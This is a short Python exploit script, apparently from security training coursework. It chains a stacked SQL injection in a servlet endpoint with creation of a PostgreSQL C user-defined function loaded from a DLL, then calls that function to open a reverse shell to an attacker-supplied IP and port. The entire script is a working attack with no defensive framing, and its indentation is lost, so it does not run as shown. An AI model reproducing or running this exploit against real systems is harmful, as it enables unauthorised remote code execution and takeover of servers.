import requests, sys
requests.packages.urllib3.disable_warnings()
proxies = {'https':'https://127.0.0.1:8080'}
def log(msg):
print (msg)
def make_request(url, sql):
log("[*] Executing query: %s" % sql[0:80])
r = requests.get( url % sql, verify=False)
return r
def create_udf_func(url):
log("[+] Creating function...")
# sql = "create+or+replace+function+rev_shell(text)+returns+void+as+$C:\\awae2.dll$,+$connect_back$+language+C+strict;"
sql = 'create or replace function rev_shell(text,int) returns void as $C:\\awae2.dll$, $connect_back$ language C strict;'
make_request(url, sql)
def trigger_udf(url, ip, port):
log("[+] Launching reverse shell...")
sql = "select rev_shell($%s$, %d)" % (ip, int(port))
make_request(url, sql)
if __name__ == '__main__':
try:
server = sys.argv[1].strip()
attacker = sys.argv[2].strip()
port = sys.argv[3].strip()
except IndexError:
print ("[-] Usage: %s serverIP:port attackerIP port" % sys.argv[0])
sys.exit()
sqli_url = "https://"+server+"/servlet/AMUserResourcesSyncServlet?ForMasRange=1&userId=1;%s;--"
create_udf_func(sqli_url)
trigger_udf(sqli_url, attacker, port)